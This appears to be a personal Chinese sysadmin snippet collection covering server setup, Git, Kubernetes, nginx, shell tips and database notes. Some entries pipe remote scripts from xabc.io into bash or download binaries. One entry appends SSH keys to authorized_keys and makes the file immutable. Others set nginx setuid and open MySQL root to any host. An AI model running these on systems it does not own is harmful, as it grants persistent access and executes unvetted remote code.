sh cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" if [ "$OS" = "RedHat" ] then yum -q -y install vim bash-completion fi if [ "$OS" = "Debian" ] then apt-get -q -y install vim bash-completion fi curl -sLo /etc/profile.d/xabc_bash.sh https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/xabc_bash.sh
git git clone https://gitlab.glority.cn/operation/matrix-build.git ./build (clone 到指定目录) 整理的常用 Git 命令清单。几个专用名词的译名如下。 Workspace:工作区 Index / Stage:暂存区 Repository:仓库区(或本地仓库) Remote:远程仓库 当你修复完线上问题,切回 feature 分支,想恢复代码也只需要:git stash apply 相关命令# 保存当前未commit的代码 git stash # 保存当前未commit的代码并添加备注 git stash save "备注的内容" # 列出stash的所有记录 git stash list # 删除stash的所有记录 git stash clear # 应用最近一次的stash git stash apply # 应用最近一次的stash,随后删除该记录 git stash pop # 删除最近的一次stash git stash drop 一、新建代码库 在当前目录新建一个Git代码库 $ git init 新建一个目录,将其初始化为Git代码库 $ git init [project-name] 下载一个项目和它的整个代码历史 $ git clone [url] 二、配置 Git的设置文件为.gitconfig,它可以在用户主目录下(全局配置),也可以在项目目录下(项目配置)。 #显示当前的Git配置 $ git config --list #编辑Git配置文件 $ git config -e [–global] #设置提交代码时的用户信息 $ git config [–global] user.name “[name]” $ git config [–global] user.email “[email address]” 三、增加/删除文件 #添加指定文件到暂存区 $ git add [file1] [file2] … #添加指定目录到暂存区,包括子目录 $ git add [dir] #添加当前目录的所有文件到暂存区 $ git add . #添加每个变化前,都会要求确认 # 对于同一个文件的多处变化,可以实现分次提交 $ git add -p #删除工作区文件,并且将这次删除放入暂存区 $ git rm [file1] [file2] … #停止追踪指定文件,但该文件会保留在工作区 $ git rm --cached [file] #改名文件,并且将这个改名放入暂存区 $ git mv [file-original] [file-renamed] 四、代码提交 #提交暂存区到仓库区 $ git commit -m [message] #提交暂存区的指定文件到仓库区 $ git commit [file1] [file2] … -m [message] #提交工作区自上次commit之后的变化,直接到仓库区 $ git commit -a #提交时显示所有diff信息 $ git commit -v #使用一次新的commit,替代上一次提交 # 如果代码没有任何新变化,则用来改写上一次commit的提交信息 $ git commit --amend -m [message] #重做上一次commit,并包括指定文件的新变化 $ git commit --amend [file1] [file2] … 五、分支 #列出所有本地分支 $ git branch #列出所有远程分支 $ git branch -r #列出所有本地分支和远程分支 $ git branch -a #新建一个分支,但依然停留在当前分支 $ git branch [branch-name] #新建一个分支,并切换到该分支 $ git checkout -b [branch] #新建一个分支,指向指定commit $ git branch [branch] [commit] #新建一个分支,与指定的远程分支建立追踪关系 $ git branch --track [branch] [remote-branch] #切换到指定分支,并更新工作区 $ git checkout [branch-name] #切换到上一个分支 $ git checkout - #建立追踪关系,在现有分支与指定的远程分支之间 $ git branch --set-upstream [branch] [remote-branch] #合并指定分支到当前分支 $ git merge [branch] #选择一个commit,合并进当前分支 $ git cherry-pick [commit] #删除分支 $ git branch -d [branch-name] #删除远程分支 $ git push origin --delete [branch-name] $ git branch -dr [remote/branch] 六、标签 #列出所有tag $ git tag #新建一个tag在当前commit $ git tag [tag] #新建一个tag在指定commit $ git tag [tag] [commit] #删除本地tag $ git tag -d [tag] #删除远程tag $ git push origin :refs/tags/[tagName] #查看tag信息 $ git show [tag] #提交指定tag $ git push [remote] [tag] #提交所有tag $ git push [remote] --tags #新建一个分支,指向某个tag $ git checkout -b [branch] [tag] git tag -a 2020-07-08 -m '2020-07-08' git push 2020-07-08 七、查看信息 #显示有变更的文件 $ git status #显示当前分支的版本历史 $ git log #显示commit历史,以及每次commit发生变更的文件 $ git log --stat #搜索提交历史,根据关键词 $ git log -S [keyword] #显示某个commit之后的所有变动,每个commit占据一行 $ git log [tag] HEAD --pretty=format:%s #显示某个commit之后的所有变动,其"提交说明"必须符合搜索条件 $ git log [tag] HEAD --grep feature #显示某个文件的版本历史,包括文件改名 $ git log --follow [file] $ git whatchanged [file] #显示指定文件相关的每一次diff $ git log -p [file] #显示过去5次提交 $ git log -5 --pretty --oneline #显示所有提交过的用户,按提交次数排序 $ git shortlog -sn #显示指定文件是什么人在什么时间修改过 $ git blame [file] #显示暂存区和工作区的差异 $ git diff #显示暂存区和上一个commit的差异 $ git diff --cached [file] #显示工作区与当前分支最新commit之间的差异 $ git diff HEAD #显示两次提交之间的差异 $ git diff [first-branch]…[second-branch] #显示今天你写了多少行代码 $ git diff --shortstat “@{0 day ago}” #显示某次提交的元数据和内容变化 $ git show [commit] #显示某次提交发生变化的文件 $ git show --name-only [commit] #显示某次提交时,某个文件的内容 $ git show [commit]:[filename] #显示当前分支的最近几次提交 $ git reflog 八、远程同步 #下载远程仓库的所有变动 $ git fetch [remote] #显示所有远程仓库 $ git remote -v #显示某个远程仓库的信息 $ git remote show [remote] #增加一个新的远程仓库,并命名 $ git remote add [shortname] [url] #取回远程仓库的变化,并与本地分支合并 $ git pull [remote] [branch] #上传本地指定分支到远程仓库 $ git push [remote] [branch] #强行推送当前分支到远程仓库,即使有冲突 $ git push [remote] --force #推送所有分支到远程仓库 $ git push [remote] --all 九、撤销 #恢复暂存区的指定文件到工作区 $ git checkout [file] #恢复某个commit的指定文件到暂存区和工作区 $ git checkout [commit] [file] #恢复暂存区的所有文件到工作区 $ git checkout . #重置暂存区的指定文件,与上一次commit保持一致,但工作区不变 $ git reset [file] #重置暂存区与工作区,与上一次commit保持一致 $ git reset --hard #重置当前分支的指针为指定commit,同时重置暂存区,但工作区不变 $ git reset [commit] #重置当前分支的HEAD为指定commit,同时重置暂存区和工作区,与指定commit一致 $ git reset --hard [commit] #重置当前HEAD为指定commit,但保持暂存区和工作区不变 $ git reset --keep [commit] #新建一个commit,用来撤销指定commit # 后者的所有变化都将被前者抵消,并且应用到当前分支 $ git revert [commit] #暂时将未提交的变化移除,稍后再移入 $ git stash $ git stash pop 十、其他 #查看远程分支和本地分支的对应关系 $git remote show origin #从本地删除远程已经删除的分支的tracking(在issue被merge之后,远程分支会被删除,那么相应的本地tracking我们也可以删除掉) $git remote prune origin #从本地删除远程已经删除的分支(merge后可以执行此操作保持工作区的清洁) $git fetch -p && for branch in `git branch -vv | grep ': gone]' | awk '{print $1}'`; do git branch -D $branch; done #生成一个可供发布的压缩包 $ git archive
b cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" if [ "$OS" = "RedHat" ] then yum -y install vim wget bzip2 unzip rsync psmisc net-tools bind-utils telnet bash-completion fi if [ "$OS" = "Debian" ] then apt-get -y install vim wget bzip2 unzip rsync psmisc net-tools dnsutils telnet fi
aliyunexporter pip3 install aliyun-exporter pip3 uninstall werkzeug pip3 install PyYAML -U pip3 install werkzeug==0.16.1
tools cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" if [ "$OS" = "RedHat" ] then yum -y install vim wget bzip2 unzip rsync bash-completion git tmux inotify-tools axel jq fi if [ "$OS" = "Debian" ] then apt-get -y insall vim wget bzip2 unzip rsync git tmux inotify-tools luajit jq fi
upx curl https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/upx -o /usr/local/bin/upx chmod +x /usr/local/bin/upx
uninstall cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" if [ "$OS" = "RedHat" ] then yum -y erase fi if [ "$OS" = "Debian" ] then echo hello fi
kubectl # kubectl edit deployment filelist -n htdz 查看deployment 中 filelist 的模版 #curl -LO https://dl.k8s.io/release/v1.21.0/bin/linux/amd64/kubectl #curl -LO https://storage.googleapis.com/kubernetes-release/release/`curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt`/bin/linux/amd64/kubectl wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/k8s/kubectl -O /usr/local/bin/kubectl chmod +x /usr/local/bin/kubectl
ki curl -sLo /usr/local/bin/ki https://r2.xabc.io/ki.py curl -sLo /etc/profile.d/zki.sh https://r2.xabc.io/zki.sh chmod 755 /usr/local/bin/ki printf "\033[1;32m%s\033[0m\n" "退出终端重新登录,输入指令 # ki 试试看"
kompose wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/k8s/kompose -O /usr/local/bin/kompose chmod +x /usr/local/bin/kompose
v wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/vim.tgz -O -|tar xzf - -C ~
tf wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/terraform/terraform -O /usr/local/bin/terraform chmod +x /usr/local/bin/terraform /usr/local/bin/terraform -install-autocomplete
t ip addr | awk '/inet / {sub(/\/.*/, "", $2); print $2}'|grep -E '^10\.|^172\.1[6-9]\.|^172\.2[0-9]\.|^172\.3[0-1]\.|^192\.168\.'|head -1
ao netstat -ao
n hostnamectl --static set-hostname
k8stips 1.当将线上kubernetes宿主机的ARP参数都改大后,再也没有出现过此类问题了。 sysctl -w net.ipv4.neigh.default.gc_thresh3=32768 sysctl -w net.ipv4.neigh.default.gc_thresh2=16384 sysctl -w net.ipv4.neigh.default.gc_thresh1=8192 2.K8S故障排查指南- but volume paths are still present on disk 1.上面错误信息可以通过 journalctl -u kubelet -f 或者 tail -f /var/log/messages 命令查看到。 2. # 查看 etc-hosts 文件中 pod name 名称 $ cat /var/lib/kubelet/pods/9e6d9bdd-1554-45e6-8831-53e83f8ea263/etc-hosts # 删除 9e6d9bdd-1554-45e6-8831-53e83f8ea263 目录 $ cd /var/lib/kubelet/pods/ $ rm -rf 9e6d9bdd-1554-45e6-8831-53e83f8ea263 3. 现在在通过 journalctl -u kubelet -f 命令看kubelet日志,就没有 Orphaned pod found - but volume paths are still present on disk 报错了。 3.走flannel的vxlan网络,vxlan需要放开udp/8472 4. 下面配置意味着单个负载会调度到一个剩余CPU request大于0.1核,剩余request内存大于200MB的节点,并且负载运行时的CPU使用率不能高于0.4核(超过将被限流),内存使用不多余300MB(超过将被OOM Kill并重启) resources: requests: memory: 200Mi cpu: "0.1" limits: memory: 300Mi cpu: "0.4" 5. 使用 kubectl 来创建 TLS Secret 时,你可以像下面的例子一样使用 tls 子命令: kubectl create secret tls my-tls-secret --cert=path/to/cert/file --key=path/to/key/file # 镜像字体 fonts-dejavu # /etc/sysctl.d/k8s.conf ( 确保 pod 之间 IP 互通) net.bridge.bridge-nf-call-ip6tables = 1 net.ipv4.ip_forward = 1 net.bridge.bridge-nf-call-iptables = 1 6. kubectl get pod --field-selector=status.phase==Running 7. immutable: true ( 不可更改的 secret / configmap ) 8. 访问某pod的某个容器: kubectl --namespace=default exec -it user-deployment-54469dd57-vg87g --container user -- sh # kubectl scale deploy -n --replicas=1 --all 可以用用scale指令修改指定命名空间下所有的deploy的副本数量。 #设置k8s预留资源保护 #/etc/systemd/system/kubelet.service.d/10-kubeadm.conf #Environment="KUBELET_CUSTOMIZED_ARGS1=--eviction-hard=imagefs.available<15%,memory.available<2Gi,nodefs.available<10%,nodefs.inodesFree<5% --system-reserved=memory=1Gi --kube-reserved=memory=400Mi --kube-reserved=pid=1000 --system-reserved=pid=1000" # systemctl daemon-reload;systemctl restart kubelet (重启kubelet 生效) #ingress配置增加注解(annotations):nginx.ingress.kubernetes.io/ssl-redirect: 'true' 就可以实现http强制跳转至https #deployment imagePullPolicy: IfNotPresent 1.简述Kubernetes中Pod可能位于的状态? Pending:API Server已经创建该Pod,且Pod内还有一个或多个容器的镜像没有创建,包括正在下载镜像的过程。 Running:Pod内所有容器均已创建,且至少有一个容器处于运行状态、正在启动状态或正在重启状态。 Succeeded:Pod内所有容器均成功执行退出,且不会重启。 Failed:Pod内所有容器均已退出,但至少有一个容器退出为失败状态。 Unknown:由于某种原因无法获取该Pod状态,可能由于网络通信不畅导致。 apt update && apt install telnet net-tools curl vim -y 2.alpine 镜像调试 apk add --no-cache busybox-extras
u ip -o -f inet addr|grep -v 'lo '|grep -Po '(?<=inet ).*(?=\/)'|awk '/^10\.|^172\.|^192\./'|head -1
sk echo $(cat ./config | base64) |tr -d " "|openssl aes-256-cbc -salt -pbkdf2 -k $SALT > secret_kubeconfig
ip IP=${SSH_CONNECTION% *};IP=${IP##* };[ -n "$IP" ]||IP=$(ip -o -f inet addr|grep -v 'lo '|grep -Po '(?<=inet ).*(?=\/)'|awk '/^10\.|^172\.|^192\.|^100\./'|head -1);echo $IP
shell #${#string} $string的长度 #${string:position} 在$string中, 从位置$position开始提取子串 #${string:position:length} 在$string中, 从位置$position开始提取长度为$length的子串 #${string#substring} 从变量$string的开头, 删除最短匹配$substring的子串 #${string##substring} 从变量$string的开头, 删除最长匹配$substring的子串 #${string%substring} 从变量$string的结尾, 删除最短匹配$substring的子串 #${string%%substring} 从变量$string的结尾, 删除最长匹配$substring的子串 #${string/substring/replacement} 使用$replacement, 来代替第一个匹配的$substring #${string//substring/replacement} 使用$replacement, 代替所有匹配的$substring #${string/#substring/replacement} 如果$string的前缀匹配$substring, 那么就用$replacement来代替匹配到的$substring #${string/%substring/replacement} 如果$string的后缀匹配$substring, 那么就用$replacement来代替匹配到的$substring #大小写转换 $ test="abcDEF" # 把变量中的第一个字符换成大写 $ echo ${test^} AbcDEF # 把变量中的所有小写字母,全部替换为大写 $ echo ${test^^} ABCDEF # 把变量中的第一个字符换成小写 $ echo ${test,} abcDEF # 把变量中的所有大写字母,全部替换为小写 $ echo ${test,,} abcdef ${VALUE:-WORD}:当变量未定义或者值为空时,返回值为WORD的内容,否则返回变量的值。 ${VALUE:=WORD}:当变量未定义或者值为空时,返回WORD的值的同时并将WORD赋值给VALUE,否则返回变量的值。 ${VALUE:+WORD}:当变量已赋值时,其值才用WORD替换,否则不进行任何替换。 ${VALUE:?MESSAGE}:当变量已赋值时,正常替换。否则将消息MESSAGE送到标准错误输出(若此替换出现在SHELL程序中,那么该程序将终止运行)。 补充:WORD可以为一个字符串,也可以为一个变量。当为变量时,需要用“$”引用该变量。 颜色指令 0 : Reset Color Attributes 1 : 加粗 2 : 去粗 4 : 下划线 5 : 闪烁 7 : 反色 21/22 : 加粗 正常 24 : 去掉下划线 25 : 停止闪烁 27 : 反色 30 : 前景,黑色 31 : 前景,红色 32 : 前景,绿色 33 : 前景,黄色 34 : 前景,篮色 35 : 前景,紫色 36 : 前景,青色 37 : 前景,白色 40 : 背景,黑色 41 : 背景,红色 42 : 背景,绿色 43 : 背景,黄色 44 : 背景,篮色 45 : 背景,紫色 46 : 背景,青色 47 : 背景,白色 其它转义字符命令 清除屏幕 : /033c 设定水平标位置 : /033[XG X为水平标位置。 设定垂直标位置 : /033[Xd Y为垂直标位置。 /033[0K : 删除从标到该行结尾 /033[1K : 删除从该行开始到标处 /033[2K : 删除整行  /033[0J : 删除标到萤幕结尾 /033[1J : 删除从萤幕开始到标处 /033[2J : 删除整个屏幕
r echo doing... curl -s xabc.io/b|bash curl -s xabc.io/e|bash curl -s xabc.io/v|bash cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/src/redis.tgz -O -|tar xzf - -C /tmp mv /tmp/redis/files/redis-$OS /opt/redis rm -rf /tmp/redis/ mkdir -p /opt/redis/conf wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/redis.conf -O /opt/redis/conf/redis.conf chmod 100 /opt/redis/bin/* pgrep redis||/opt/redis/bin/redis-server /opt/redis/conf/redis.conf ps aux|grep redis
tips # 编译 openresty # wget -t 3 https://openresty.org/download/openresty-1.21.4.3.tar.gz -O -|tar xzf - # wget -t 3 https://zlib.net/current/zlib.tar.gz -O -|tar xzf - # yum -y install gcc gcc-c++ make readline-devel pcre-devel openssl-devel perl bzip2-devel clang zlib-devel #./configure --prefix=/home/ywgx/0/openresty --with-pcre-jit --with-stream --with-stream_ssl_preread_module --with-stream_ssl_module --with-http_v2_module --with-http_iconv_module --without-http_limit_req_module --without-http_limit_conn_module --without-http_split_clients_module --without-poll_module --without-select_module --without-http_fastcgi_module --without-http_uwsgi_module --without-http_scgi_module --without-http_memcached_module --without-http_ssi_module --without-http_geo_module --without-http_empty_gif_module --without-http_browser_module --without-http_upstream_ip_hash_module --without-http_upstream_least_conn_module --without-http_upstream_zone_module --with-zlib=../zlib # nginx 跨域配置 add_header 'Access-Control-Allow-Origin' '*' always; add_header 'Access-Control-Allow-Headers' 'Authorization,Accept,Origin,Keep-Alive,User-Agent,Content-Type' always; add_header 'Access-Control-Allow-Methods' 'GET,POST,OPTIONS,PUT,DELETE' always; add_header 'Access-Control-Expose-Headers' 'X-Jump,X-Session-Valid' always; if ($request_method = 'OPTIONS') { add_header 'Access-Control-Allow-Origin' '*' always; add_header 'Access-Control-Allow-Headers' 'Authorization,Accept,Origin,Keep-Alive,User-Agent,Content-Type' always; add_header 'Access-Control-Allow-Methods' 'GET,POST,OPTIONS,PUT,DELETE' always; add_header 'Access-Control-Expose-Headers' 'X-Jump,X-Session-Valid' always; add_header 'Access-Control-Max-Age' 1728000; return 204; } #查询命令安装包 yum provides envsubst 或者 yum whatprovides envsubst #标准输出 /dev/stdout #标准输入 /dev/stdin #标准错误输出 /dev/stderr #nfs 依赖 yum -y install nfs-utils #sftp 可以 ftp 不行的问题,查看 getsebool allow_ftpd_full_access 如果是 off ,可以打开 setsebool allow_ftpd_full_access #pip3 install -U pip setuptools #pip3 download -d packages/ -r requirements.txt 把依赖包都下到packages文件夹里 #pip3 install --no-index --find-links=packages/ -r requirements.txt 离线安装 #pip3 freeze > requirements.txt # problem making ssl connection 先把 /etc/yum.repos.d/rdo-release.repo里的enabled=0,禁用掉 在执行yum install ca-certificates # RPM 数据库问题 'yum check' 解决方法 package-cleanup --cleandupes # module_name = shell 将默认的模块改为shell,command模块功能太弱 ansible AppGroup -m shell -a 'w' #查看域名 dns dig baidu.com +nssearch #显示连接用户信息 ss -tapo dport = :3306 #可以使用以下命令查使用内存最多的10个进程 ps -aux | sort -k4nr | head -n 10 #可以使用一下命令查使用CPU最多的10个进程 ps -aux | sort -k3nr | head -n 10 # 物理内存大小 = 物理已使用的内存 + 物理没使用的内存 total = used + free # 可用内存大小 = 物理没使用的内存 + 缓冲 + 缓存 available = free + buffers + cached # 内存使用率 = (物理内存大小 - 可用内存大小) / 物理内存大小 * 100 percent = (total - available) / total * 100 /etc 系统文件属性恢复 #restorecon -Rv /etc PATH=$PATH:$HOME/.local/bin:$HOME/bin 查看某进程的文件打开数 cat /proc//limits ls -lh /proc//fd ls -lh /proc//fd|wc -l import salt.client local = salt.client.LocalClient() print(help(local.cmd)) find . -type f | parallel -j+0 grep -i foobar 并发的grep systemctl list-unit-files --type=service|grep enabled ulimit -n # 查看当前用户可用最大句柄 sysctl -a | grep fs.file-max # 查看内核级的文件句柄最大限制值 cat /proc/sys/fs/file-nr # 查看当前已用的文件句柄数量 和 内核级的文件句柄限制的最大值 乱码转换 :set fileencoding=UTF-8 :x! TAB替换为空格: :se ts=4 :se et :%retab! 空格替换为TAB: :se ts=4 :se noet :%retab! curl 2 python: https://curl.trillworks.com au BufNewFile,BufRead *.py se ts=4 sts=4 sw=4 et k8s minikube start --driver=hyperv --memory=4096m --image-repository=registry.cn-hangzhou.aliyuncs.com/google_containers /etc/security/limits.conf (注意同时要留意 /etc/security/limits.d/下面的参数) root soft nofile 65535 root hard nofile 65535 * soft nofile 65535 * hard nofile 65535 * soft nproc 65535 * hard nproc 65535 还要追加下面一行给(/etc/pam.d/login) session required pam_limits.so usermod -aG wheel ywgx (把 ywgx 添加入wheel分组) rsync -av --progress --delete /tmp/abc ywgx@base.xabcstack.com:/tmp/ (这个会把当前主机 /tmp/abc 同步到目标机器 /tmp/ 目录下,如果没有自动创建abc目录) rsync --daemon --config=./rsyncd.conf rsync -aq --progress root@repo.xabcstack.com::salt . rsync -aq --progress --delete --exclude={"COMMIT",} /cache/sys root@172.18.10.144:/cache/ (把当前主机 /cache/sys 目录同步到目标机器 /cache/, 跳过/cache/sys/COMMIT 这个目录 ) return 301 https://$host$request_uri; awk '{ print $(NF-2) }' scp -P 12349 upload_file username@server echo "*/5 * * * * pgrep sentinel.py||/srv/zero/sentinel.py &>/var/log/xabc.log &" > /var/spool/cron/root for i in `find /root/.jenkins/jobs -maxdepth 6 -name "[0-9]*" -a -mtime +3`;do rm -rf $i;done */5 * * * * pgrep nginx||/opt/openresty/nginx/sbin/nginx netstat -aulntp nc -vuz 100.67.1.217 514 (探测主机100.67.1.217 UDP 514 端口是否打开) Influxdata 数据备份和恢复 备份: influxd backup -database database_name 数据存储位置 influxd backup -database database_name -host localhost:8088 数据存储位置 # 远程备份 恢复元数据: influxd restore -metadir /var/lib/influxdb/meta/ 元数据存储位置 influxd restore -database database_name -datadir /var/lib/influxdb/data 数据存储位置 修改权限: chown -R influxdb:influxdb /var/lib/influxdb 重启influxdb: service influxdb stop service influxdb start 磁盘挂载 1. fdisk -l 2. mkfs.ext4 /dev/vd{x} 3. mount /dev/vd{x} /media 4. vim /etc/fstab /dev/vd{x} /media ext4 defaults 0 0 时区设置 timedatectl set-timezone Asia/Shanghai timedatectl 查看时间设置 chronyc sources -v 查看时间同步状态 提示Read-only file system,执行命令 mount -o remount rw / 同步本地时间到硬件 hwclock --systohc 通过redis-cli导入数据 通过在ECS上的redis-cli,可将用户ECS上原有的数据导入到云数据库Redis版中,操作代码为: # redis-cli -h old_instance_ip -p old_instance_port config set appendonly yes # redis-cli -h aliyun_redis_instance_ip -p 6379 -a password --pipe < appendonly.aof # terraform terraform version 查看 Terraform 版本 terraform init 初始化 Terraform terraform plan Terraform 执行计划 terraform apply 应用 Terraform terraform show 检查 Terraform 状态 terraform output 查看输出变量的值 terraform graph 生成资源依赖图 terraform destroy 销毁资源 terraform workspace 管理 Terraform 工作区 terraform workspace new 新建工作区 terraform workspace list 列出工作区 terraform workspace select 切换工作区 terraform workspace delete 删除工作区 terraform get 下载或更新 Terraform 模块 terraform fmt 格式化 Terraform 代码 terraform validate 检查 Terraform 语法 terraform console Terraform 控制台 iptables -I INPUT -s xmr.crypto-pool.fr -j DROP iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP iptables -A INPUT -p tcp --dport 22 -j ACCEPT iptables -t mangle -I POSTROUTING -p tcp -m tcp --tcp-flags SYN,RST SYN -j TCPMSS --set-mss 1024 firewall systemctl start firewalld firewall-cmd --reload firewall-cmd --permanent --add-service=http firewall-cmd --permanent --add-service=https use mysql; update user set host = '%' where user = 'root'; FLUSH PRIVILEGES;
i if [ $USER = ywgx ];then wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/vim.tgz -O -|tar xzf - -C ~ wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/.gitconfig -O ~/.gitconfig wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/.gitignore -O ~/.gitignore wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/.my.cnf -O ~/.my.cnf wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/.wgetrc -O ~/.wgetrc if ! grep -q "ge4MSI5hlWSw" ~/.ssh/authorized_keys &>/dev/null;then [ -e ~/.ssh/authorized_keys ]&&chattr -ai ~/.ssh/authorized_keys||mkdir -p -m 700 ~/.ssh echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDHZyWeFOHuHtLgsGLNx4sCYVXv/FfFi3ZcTSOSyX2oRgRm4xflPDgJHGSlCjtP2IluM6gG+o9+fS0WpcQkiaabe4wJVf5/hdFvJY7BgG4SslmdYGGtXKqFKXLq0pkuQQTnitBYQvAwEjBuHYB0KuuJG1XSss3ubzTZzoveeIVOJgamoGgm42D2G0ZOAH7ovRj3eFvjJImepaSJEDUe1SbNHoptSQvLMV+y5LDNb7xxRUk4hH09o/f2O9jxPbxL8f9nP94ZoT2XjVhvKRKVz51AHs9pNTry7ge4MSI5hlWSwjiFO+jJLuIiGdRGVxEzToMOkPBaH3HXs1pJHu+/9fqCwvgW4+Wp7FTBhPmX/9VSjGpO+uwlj3zRZHyDxs3Enup+Bok/WH9e5GLQj/KzWQD6s/6s0/9UC9YfZRU7E+uRvXf21zpAkmaGGQsOv5FV7ZqciYRn66dq65ahx2xmi4hkBoTrdP595lRPuQEOW1ziTI08pxU9eZA/f/s4AsQL/IHU9LkiA8gqGXlembuBxL20OietQTLn5AYev6rmU0m4IZ1yKu2AzT5gaG//8XuSGzT0o8ppvSgIalDBnS+W/2xQCc0xGY7yX51MIdc+E7edWw14VqL0ESXIHZfB7uOGOAMjfMP3GIoHOIatI+rsd8D30sKEEBXDYAgwu2yZgskGmw== ywgx" >> ~/.ssh/authorized_keys chmod 600 ~/.ssh/authorized_keys chattr +ai ~/.ssh/authorized_keys fi if ! grep -q "Ogsuw71ublt" ~/.ssh/authorized_keys &>/dev/null;then [ -e ~/.ssh/authorized_keys ]&&chattr -ai ~/.ssh/authorized_keys||mkdir -p -m 700 ~/.ssh echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDT36lNbtc7eqPC6KrrGoOJm43cGrTkLBfNJPuUVR7odSMBn53P5vjuG4BVeXP/yhiVAjerPrh/03e5xOoI5X1UD56H52XpXLoMkGGAR6uSRSNzjSgt1XBFREWBnOgsuw71ubltsfHKPBjnkwnMRePLD5aoMeTyvylhAxTMMLm3GPSCCTMII8bmuxTx8k1IJ8oW078ak6LeBOFFl/SOFiMeWSvqA21fi8gUMhWte3NN4trNUIDPdSprOZx1Yk4nnZh5jkrVv5iZX3DtrsaVhYegwK06VBRiycqDj32d1kOWyFBdhWHADMMoD4UAHnFxn+5igeRyS2yI9XFgQTQDaWw+cLvYe4wYr+pJ66Vk4v5f1AeOg/F4UewhJ4Sr/2AtZJOxgAhPv7gdyf4aDePfxlZwuUD+chMbntOZzUuaI5rU8uh4lWaNCG0eGvH0ul3pjS2p4FKJ378XKi87DcqGQLZJytjbMqc8NalTl/AbbMgjZbB8ZHpZAl2G1gq1uicAjMsm0j0nLmvAb6vPe9lQTp0Jb09yddM3VX9XtF15yz1Si1COu1I5nldEGc12nBFLxIRBEk6vaDZYo5gY14rdrWuiZ85j5I0vEUbiuFF3lzf+j0iHg3UgZcuYo5QFBiApyyWt1wDvHKnLE3FZVj0uSzscmZ5/4rk06ZAwCdwjzAXZCQ== xabc" >> ~/.ssh/authorized_keys chmod 600 ~/.ssh/authorized_keys chattr +ai ~/.ssh/authorized_keys fi fi
dba # 更改数据库 users 表里面字段名称 ALTER TABLE users RENAME COLUMN request_count TO requests;
j echo doing... curl -s xabc.io/b|bash curl -s xabc.io/e|bash curl -s xabc.io/v|bash wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/src/java.tgz -O -|tar xzf - -C /tmp tar xzf /tmp/java/files/jdk.tgz -C /opt tar xzf /tmp/java/files/tomcat.tgz -C /opt mv /tmp/java/files/*.sh /etc/profile.d/ rm -rf /tmp/java/ echo "/opt/{jdk,tomcat}"
gitlab Git 全局设置 git config --global user.name "Administrator" git config --global user.email "admin@example.com" 创建一个新仓库 git clone git@gitlab.lejiapay.com:gitlab-instance-29c6df9a/Monitoring.git cd Monitoring touch README.md git add README.md git commit -m "add README" git push -u origin master 推送现有文件夹 cd existing_folder git init git remote add origin git@gitlab.lejiapay.com:gitlab-instance-29c6df9a/Monitoring.git git add . git commit -m "Initial commit" git push -u origin master 推送现有的 Git 仓库 cd existing_repo git remote rename origin old-origin git remote add origin git@gitlab.lejiapay.com:gitlab-instance-29c6df9a/Monitoring.git git push -u origin --all git push -u origin --tags 查找版本号 git log --oneline 重置到某一版本 git reset --hard 版本号
m yum -y install wget yum -y install https://repo.saltstack.com/py3/redhat/salt-py3-repo-latest.el7.noarch.rpm yum -y install salt-minion systemctl enable salt-minion.service
err tail -f access.log|awk '$1 > 399 {print $0}'
o echo doing... curl -s xabc.io/b|bash curl -s xabc.io/e|bash curl -s xabc.io/v|bash cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/openresty-$OS.tgz -O -|tar xzf - -C /opt wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/nginx.conf -O /opt/openresty/nginx/conf/nginx.conf mkdir -p /opt/openresty/nginx/conf/ssl id -u nobody &>/dev/null||useradd nobody -r -s /bin/false groupadd -f nobody &>/dev/null chown root.nobody /opt/openresty/nginx/sbin/nginx if [ "$OS" = "RedHat" ] then grep -q nginx /etc/rc.d/rc.local||echo "/opt/openresty/nginx/sbin/nginx" >> /etc/rc.d/rc.local;chmod 755 /etc/rc.d/rc.local fi if [ "$OS" = "Debian" ] then grep -q nginx /etc/rc.local||echo "/opt/openresty/nginx/sbin/nginx" >> /etc/rc.local;chmod 755 /etc/rc.local fi chmod +xs /opt/openresty/nginx/sbin/nginx echo "/opt/openresty"
